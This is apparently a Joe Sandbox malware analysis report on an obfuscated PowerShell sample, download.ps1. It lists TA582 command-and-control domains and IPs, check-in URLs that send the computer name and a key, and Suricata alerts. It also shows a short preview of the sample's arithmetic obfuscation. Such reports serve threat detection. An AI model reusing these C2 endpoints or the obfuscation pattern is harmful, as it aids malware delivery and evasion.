                                                        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F201C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F21C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/Iconpowershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://0.googlepowershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.microsoft.powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://0.google.powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://0.google.com/powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://$tcbm1lixhefpkn0/$9rkis8hejvfl3c4.php?id=$env:computername&key=$bhwpnfx&s=527powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E363D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2217128894.00000111E21D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://aka.ms/pscore68powershell.exe, 00000000.00000002.2217128894.00000111E1FB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.mf-powershell.exe, 00000000.00000002.2264659089.00000111FA277000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.2217128894.00000111E3AB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              45.61.136.138
                                                                                                              		gajaechkfhfghal.topUnited States
                                                                                                              		40676AS40676USfalse
                                                                                                              142.250.181.68
                                                                                                              		www.google.comUnited States
                                                                                                              		15169GOOGLEUSfalse

                                                                                                              General Information

                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                              Analysis ID:1580819
                                                                                                              Start date and time:2024-12-26 10:01:05 +01:00
                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                              Overall analysis duration:0h 4m 12s
                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                              Report type:full
                                                                                                              Cookbook file name:default.jbs
                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                              Number of analysed new started processes analysed:6
                                                                                                              Number of new started drivers analysed:0
                                                                                                              Number of existing processes analysed:0
                                                                                                              Number of existing drivers analysed:0
                                                                                                              Number of injected processes analysed:0
                                                                                                              Technologies:
                                                                                                              • HCA enabled
                                                                                                              • EGA enabled
                                                                                                              • AMSI enabled
                                                                                                              Analysis Mode:default
                                                                                                              Analysis stop reason:Timeout
                                                                                                              Sample name:download.ps1
                                                                                                              Detection:MAL
                                                                                                              Classification:mal84.evad.winPS1@2/7@2/2
                                                                                                              EGA Information:Failed
                                                                                                              HCA Information:
                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 18
                                                                                                              • Number of non-executed functions: 12
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .ps1

                                                                                                              Warnings

                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56, 172.202.163.200
                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 6672 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                              Simulations

                                                                                                              Behavior and APIs

                                                                                                              TimeTypeDescription
                                                                                                              04:01:55API Interceptor41x Sleep call for process: powershell.exe modified

                                                                                                              Joe Sandbox View / Context

                                                                                                              IPs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • gajaechkfhfghal.top/wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • gajaechkfhfghal.top/roqyfncdwahtr.php?id=user-PC&key=81114521757&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • gajaechkfhfghal.top/g458bzp6m1htr.php?id=computer&key=56848542613&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • gajaechkfhfghal.top/jzik4w36vshtr.php?id=user-PC&key=35005560655&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • gajaechkfhfghal.top/aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • gajaechkfhfghal.top/q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/mes6v8wj5phtr.php?id=computer&key=28342894733&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • cmacnnkfbhlcncm.top/tj9wps52g1htr.php?id=computer&key=19746202345&s=527

                                                                                                              Domains

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              gajaechkfhfghal.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138

                                                                                                              ASNs

                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              AS40676UStelnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 45.34.255.95
                                                                                                              armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 45.34.153.95
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138

                                                                                                              JA3 Fingerprints

                                                                                                              No context

                                                                                                              Dropped Files

                                                                                                              No context

                                                                                                              Created / dropped Files

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):1.1628158735648508
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:NlllulFgtj:NllUa
                                                                                                              MD5:E986DDCA20E18C878305AA21342325F6
                                                                                                              SHA1:AE6890EE7BB81A051A4F4079F549DEBCCE0F82C9
                                                                                                              SHA-256:9624DAA47DF80C2229877179550D8373CAEEEAE25A8123698D7A516AD455DD15
                                                                                                              SHA-512:8B0CD5C1F0BAECA299669D6A0CB74F9315E90B05EDEA16C92B92D9927D3D07225AC5DAE9941CF339E1CED349BA8129F56F118CF89AB86CF8DAAAFFDB8EC8B56D
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Preview:@...e................................................@..........

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4b2u4agp.atf.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bystohpn.pmv.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cg22zwuq.3ww.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbqcurvk.5pm.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6224
                                                                                                              Entropy (8bit):3.7259464046144544
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:rkD9l8tq6mx63CyMlU2UpzukvhkvklCywpBZ/iilHJnSogZo1hZ/iilHfnSogZoH:MUp3CoTUkvhkvCCtX9iieHE9iilKHO
                                                                                                              MD5:8A1B648C59102212C578F26801F73DBD
                                                                                                              SHA1:11B6C74D0194A82FD9401A86A456C8F06F06B4B5
                                                                                                              SHA-256:7E80E5A2C44DF5C044CFDBEF6A86DC9E4865D70542B48E0EB45B93D591321654
                                                                                                              SHA-512:75E7853EFC522C18D656A2FD25080E442D87C814C72AA638AE068B060641F29C75D307CE1189DDE69958B950C5D6A7B2E7DDB6FBD1DF64BC94312773A4F687BC
                                                                                                              Malicious:false
                                                                                                              Preview:...................................FL..................F.".. ...J.S...Y...tW..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....v..tW......tW......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y:H...........................^.A.p.p.D.a.t.a...B.V.1......Y8H..Roaming.@......EW<2.Y8H..../......................H..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y5H....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y5H....2......................1..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y5H....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y5H....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y;H....u...........

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZEU651Q9U52IS0G3LUZM.temp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6224
                                                                                                              Entropy (8bit):3.7259464046144544
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:rkD9l8tq6mx63CyMlU2UpzukvhkvklCywpBZ/iilHJnSogZo1hZ/iilHfnSogZoH:MUp3CoTUkvhkvCCtX9iieHE9iilKHO
                                                                                                              MD5:8A1B648C59102212C578F26801F73DBD
                                                                                                              SHA1:11B6C74D0194A82FD9401A86A456C8F06F06B4B5
                                                                                                              SHA-256:7E80E5A2C44DF5C044CFDBEF6A86DC9E4865D70542B48E0EB45B93D591321654
                                                                                                              SHA-512:75E7853EFC522C18D656A2FD25080E442D87C814C72AA638AE068B060641F29C75D307CE1189DDE69958B950C5D6A7B2E7DDB6FBD1DF64BC94312773A4F687BC
                                                                                                              Malicious:false
                                                                                                              Preview:...................................FL..................F.".. ...J.S...Y...tW..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....v..tW......tW......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y:H...........................^.A.p.p.D.a.t.a...B.V.1......Y8H..Roaming.@......EW<2.Y8H..../......................H..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y5H....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y5H....2......................1..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y5H....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y5H....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Y;H....u...........

                                                                                                              Static File Info

                                                                                                              General

                                                                                                              File type:ASCII text, with very long lines (11443), with CRLF line terminators
                                                                                                              Entropy (8bit):5.992473390940018
                                                                                                              TrID:
                                                                                                                File name:download.ps1
                                                                                                                File size:20'721 bytes
                                                                                                                MD5:8d7677123f246bb6bfaf3e54501aa93d
                                                                                                                SHA1:a2087790c0105e329964e38e776da360ce38fc3e
                                                                                                                SHA256:ff7bc609b58de655c7e0b5ffb9c4a7adce64a8cf24bb131573b1def9ca66db84
                                                                                                                SHA512:ef768006e6ba6b6dc90c1ba8703145b373b4721793d7f7812afc5a26ff051bfb1eb4a66fd9a364352bab4c5f1a33ffee5c6ee90c09c2eb6b6ff8e02fda4f3249
                                                                                                                SSDEEP:384:5Fvv1wGq6Bel+IwN07V9dKGk9rIBu2vMh1lAN+ChXwT07h1O5QZMIqc:5Fv1fbIVJ9HZBzMh1uoCOch1IQZN
                                                                                                                TLSH:F0927D94BB8DE8E2D6ECDB2FB6033C147751716B90EA69C4F6DCD1C523A03456E89C82
                                                                                                                File Content Preview:$sfaogbmuirt=$executioncontext;$alisinonenanediseranedalenesed = (-jOIn (@((470375/(3758+5117)),(8486-(12037-(36134487/(12224-(5180-(15510060/(34278012/6597))))))),(133551/(2613-270)),(-3343+(13306-9913)),(334-278),(-4230+(3904+380)),(271096/4841),(2043-(

                                                                                                                File Icon

                                                                                                                Icon Hash:3270d6baae77db44

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-12-26T10:01:58.643168+01002859405ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.2.6516031.1.1.153UDP
                                                                                                                2024-12-26T10:02:00.603527+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.64969945.61.136.13880TCP
                                                                                                                2024-12-26T10:02:00.603527+01002057741ET MALWARE TA582 CnC Checkin1192.168.2.64969945.61.136.13880TCP
                                                                                                                2024-12-26T10:02:02.718194+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.649700142.250.181.6880TCP

                                                                                                                Network Port Distribution

                                                                                                                TCP Packets

                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Dec 26, 2024 10:01:59.059164047 CET4969980192.168.2.645.61.136.138
                                                                                                                Dec 26, 2024 10:01:59.179007053 CET804969945.61.136.138192.168.2.6
                                                                                                                Dec 26, 2024 10:01:59.179092884 CET4969980192.168.2.645.61.136.138
                                                                                                                Dec 26, 2024 10:01:59.182908058 CET4969980192.168.2.645.61.136.138
                                                                                                                Dec 26, 2024 10:01:59.302403927 CET804969945.61.136.138192.168.2.6
                                                                                                                Dec 26, 2024 10:02:00.550543070 CET804969945.61.136.138192.168.2.6
                                                                                                                Dec 26, 2024 10:02:00.603527069 CET4969980192.168.2.645.61.136.138
                                                                                                                Dec 26, 2024 10:02:00.714569092 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:00.834186077 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:00.834270000 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:00.843393087 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:00.962902069 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718004942 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718070984 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718082905 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718152046 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718164921 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718190908 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718194008 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.718202114 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718213081 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718329906 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.718378067 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718389988 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.718444109 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.837733030 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.837800980 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.837898016 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.910152912 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.910320044 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.910381079 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.914328098 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.915659904 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.915726900 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.915751934 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.923899889 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.923966885 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.926795959 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.926867008 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.926922083 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.934854031 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.940352917 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.940429926 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.940453053 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.944571972 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.944617033 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.953944921 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.954080105 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.954133034 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.958079100 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.967623949 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.967694044 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.967701912 CET4970080192.168.2.6142.250.181.68
                                                                                                                Dec 26, 2024 10:02:02.971704006 CET8049700142.250.181.68192.168.2.6
                                                                                                                Dec 26, 2024 10:02:02.971771002 CET4970080192.168.2.6142.250.181.68
